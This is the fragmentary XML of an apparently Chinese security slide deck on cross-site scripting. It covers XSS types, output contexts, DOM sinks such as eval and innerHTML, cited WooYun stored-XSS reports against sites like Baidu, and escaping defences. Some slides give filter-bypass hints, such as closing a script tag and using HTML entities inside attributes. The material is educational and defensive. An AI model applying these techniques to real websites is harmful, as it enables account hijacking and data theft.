              <a:ext cx="1449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Reflected XSS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1482" y="4702743"/>
            <a:ext cx="1220188" cy="869398"/>
            <a:chOff x="1079243" y="3643314"/>
            <a:chExt cx="1220188" cy="869398"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1079243" y="3643314"/>
              <a:ext cx="1206741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存储型</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>XSS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15581" y="4143380"/>
              <a:ext cx="1183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Stored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dirty="0" smtClean="0"/>
                <a:t>XSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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2231" y="1500175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恶意代码存放位置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00430" y="3643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地址栏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51961" y="59171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数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="http://www.iconpng.com/png/webcons/clock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1357299"/>
            <a:ext cx="571504" cy="57150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357950" y="148803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恶意代码效果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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428596" y="2214555"/>
            <a:ext cx="8429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28596" y="4357695"/>
            <a:ext cx="84296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2821769" y="3750472"/>
            <a:ext cx="5357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-321503" y="3750472"/>
            <a:ext cx="5357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3" name="Picture 9" descr="http://files.jb51.net/scimg/web/20101025/Hat-bowl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1285861"/>
            <a:ext cx="785818" cy="785818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5857884" y="357187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用户点击恶意链接打开时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执行恶意代码，隐蔽性差</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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929322" y="2786059"/>
            <a:ext cx="2470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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.wooyun.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500826" y="2643183"/>
            <a:ext cx="785818" cy="785818"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D5F4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653226" y="2795583"/>
            <a:ext cx="490542" cy="49054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 rot="7979835">
            <a:off x="6743523" y="2679177"/>
            <a:ext cx="642942" cy="35719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549481" y="5786455"/>
            <a:ext cx="3175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用户浏览带有恶意代码的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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>正常页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>时触发，隐蔽性强</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="图片 36" descr="icenter.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect r="55423"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5786446" y="4714884"/>
            <a:ext cx="2857520" cy="80010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2857488" y="2786058"/>
            <a:ext cx="2286016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7" name="Picture 13" descr="http://www.aiimg.com/pic/png/200901/png_576/aiimg_com_576_liulanqi0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43174" y="2571744"/>
            <a:ext cx="928694" cy="928694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3571868" y="2857496"/>
            <a:ext cx="1500198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539860" y="2857496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http://pkav.net</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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928926" y="4643446"/>
          <a:ext cx="2214580" cy="10404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2916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
                <a:gridCol w="442916"/>
              </a:tblGrid>
              <a:tr h="346829"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A</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="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B</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="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C</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="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D</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="85519" marR="85519" marT="42760" marB="42760"/>
                </a:tc>
              </a:tr>
              <a:tr h="346829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519" marR="85519" marT="42760" marB="42760"/>
                </a:tc>
              </a:tr>
              <a:tr h="346829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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="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519" marR="85519" marT="42760" marB="42760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5519" marR="85519" marT="42760" marB="42760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42910" y="3643314"/>
            <a:ext cx="160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Non-persistent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1012" y="5559998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Persistent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4046" y="4572008"/>
            <a:ext cx="120674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反射型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179666" y="4000504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750906" y="3143248"/>
            <a:ext cx="1357322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XSS Filter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4250442" y="41433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778064" y="3071810"/>
            <a:ext cx="1357322" cy="714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扫描器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10800000" flipV="1">
            <a:off x="5322806" y="4000504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822872" y="3143248"/>
            <a:ext cx="1357322" cy="7143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WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>产品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7964" y="2571744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但是危害越来越小</a:t>
            </a:r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08294" y="2285992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但是容易被扫</a:t>
            </a:r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79996" y="2571744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但是容易被干掉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500034" y="285728"/>
            <a:ext cx="2520154" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2520154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857224" y="285728"/>
              <a:ext cx="2162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XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>攻击的现状</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400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894046" y="5572140"/>
            <a:ext cx="120674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57620" y="1071546"/>
            <a:ext cx="11079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广泛存在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rot="5400000">
            <a:off x="4109154" y="185736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0800000" flipV="1">
            <a:off x="2822476" y="1571612"/>
            <a:ext cx="1000132" cy="785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037054" y="1500174"/>
            <a:ext cx="1071570" cy="785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5572132" y="1428736"/>
            <a:ext cx="1714512" cy="2214578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572132" y="3786190"/>
            <a:ext cx="1714512" cy="2214578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00034" y="285728"/>
            <a:ext cx="2827931" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="2827931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24707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</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>的分类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8596" y="3000372"/>
            <a:ext cx="110799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输出内容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 flipH="1" flipV="1">
            <a:off x="1679555" y="2608257"/>
            <a:ext cx="49847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剪去单角的矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357422" y="2143116"/>
            <a:ext cx="1643074" cy="857256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输出未过滤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143372" y="257174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43570" y="1785926"/>
            <a:ext cx="153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HTML-Context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43570" y="2357430"/>
            <a:ext cx="116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JS-Context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43570" y="2928934"/>
            <a:ext cx="12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Css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-Context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786314" y="2571744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786314" y="2071678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1678761" y="3321843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剪去单角的矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357422" y="3357562"/>
            <a:ext cx="1643074" cy="857256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输出已过滤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143372" y="3929066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43372" y="4143380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Dom-Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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43570" y="3857628"/>
            <a:ext cx="56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eval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43570" y="421481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innerHTML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643570" y="4572008"/>
            <a:ext cx="125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setTimeout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643570" y="4929198"/>
            <a:ext cx="117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setInterval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43570" y="5274246"/>
            <a:ext cx="168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document.write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643834" y="1928802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根据输出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>内容所处</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的位置来</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分类。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643834" y="4214818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经常需要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>二次过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>员忽略掉</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了。</a:t>
            </a:r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 rot="5400000" flipH="1" flipV="1">
            <a:off x="3964777" y="4964917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09842" y="5631436"/>
            <a:ext cx="226215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会自动发生一些转义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 rot="5400000" flipH="1" flipV="1">
            <a:off x="3929058" y="1142984"/>
            <a:ext cx="1643074" cy="1214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72132" y="642918"/>
            <a:ext cx="167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Flash-based XSS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8596" y="4357694"/>
            <a:ext cx="174919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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/HTML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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="50" name="直接连接符 49"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="285720" y="3884522"/>
            <a:ext cx="8572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834506" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4834506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477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HTML-Context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 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28596" y="928670"/>
            <a:ext cx="555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wooyun-2010-07831  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>random_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>百度某分站存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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t="27000" r="6779" b="6999"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500034" y="1643050"/>
            <a:ext cx="6286544" cy="1571636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857760"/>
            <a:ext cx="6286544" cy="13335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3500438"/>
            <a:ext cx="6286544" cy="103822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057787" y="2285992"/>
            <a:ext cx="180049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/>
              <a:t>恶意代码的输入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72330" y="3929066"/>
            <a:ext cx="180049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/>
              <a:t>恶意代码的输出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72330" y="5643578"/>
            <a:ext cx="180049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/>
              <a:t>恶意代码的执行</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="下箭头 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643834" y="3071810"/>
            <a:ext cx="428628" cy="500066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7643834" y="4857760"/>
            <a:ext cx="428628" cy="50006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57290" y="2428868"/>
            <a:ext cx="221457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&lt;, &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>替换为 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lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>gt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rot="10800000" flipV="1">
            <a:off x="2857488" y="2072472"/>
            <a:ext cx="429422" cy="284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000496" y="2071678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14744" y="2428868"/>
            <a:ext cx="25717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判断存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;, &gt; ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止提交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576422" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4576422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219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JS-Context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638301"/>
            <a:ext cx="66675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4348" y="928670"/>
            <a:ext cx="490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wooyun-2010-09111 (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) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>点点网存储型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3631172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JS-Context </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的利用方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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48" y="4000504"/>
            <a:ext cx="528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 smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>闭合当前脚本，然后输入自定义内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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 r="1098"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857224" y="4429132"/>
            <a:ext cx="428628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85786" y="5357826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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>上下文，构造正确的闭合。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1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 r="2173"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857224" y="5819797"/>
            <a:ext cx="428628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214942" y="4429132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过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;,&gt;,/ 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14942" y="4786322"/>
            <a:ext cx="388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替换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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&lt;/’+’script&gt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网易邮箱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86380" y="5643578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根据实际情况，进行过滤。通常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>输出是字符串，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之间，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即可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4348" y="1214422"/>
            <a:ext cx="490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wooyun-2010-02321(Clouds) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度贴吧存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS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034" y="285728"/>
            <a:ext cx="4576422" cy="461665"/>
            <a:chOff x="500034" y="285728"/>
            <a:chExt cx="4576422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857224" y="285728"/>
              <a:ext cx="4219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JS-Context </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>存储型</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
                <a:t>XSS </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>及其防御</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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500034" y="390203"/>
              <a:ext cx="214314" cy="21431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45910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34" y="2571744"/>
            <a:ext cx="365350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和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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一样，过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’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"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3143248"/>
            <a:ext cx="720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而实际上，在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的属性里，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;#NNN;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&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xNN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>也是可以被执行的！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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63" y="3643314"/>
            <a:ext cx="58769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5357826"/>
            <a:ext cx="3552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环形箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3462366">
            <a:off x="6806401" y="4448955"/>
            <a:ext cx="857256" cy="857256"/>
          </a:xfrm>
          <a:prstGeom prst="circular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2396" y="400050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进一步构造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用代码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472" y="5929330"/>
            <a:ext cx="29415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还需要将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过滤为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&amp;amp;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 rot="10800000">
            <a:off x="4214811" y="6000768"/>
            <a:ext cx="500066" cy="2143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572132" y="285728"/>
          <a:ext cx="3333784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66892"/>
                <a:gridCol w="16668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转义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&amp;#x22; / &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>quot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&amp;#x27;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&amp;#x3C; / &amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>lt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&amp;#x3E;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> / 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en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
                        <a:t>gt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&amp;#x5C;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&amp;#x2F;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1981</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>369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Company>toolmao.com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gainover</dc:creator>
  <cp:lastModifiedBy>Windows 用户</cp:lastModifiedBy>
  <cp:revision>156</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-25T05:42:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-03-31T13:15:21Z</dcterms:modified>
</cp:coreProperties>
</file>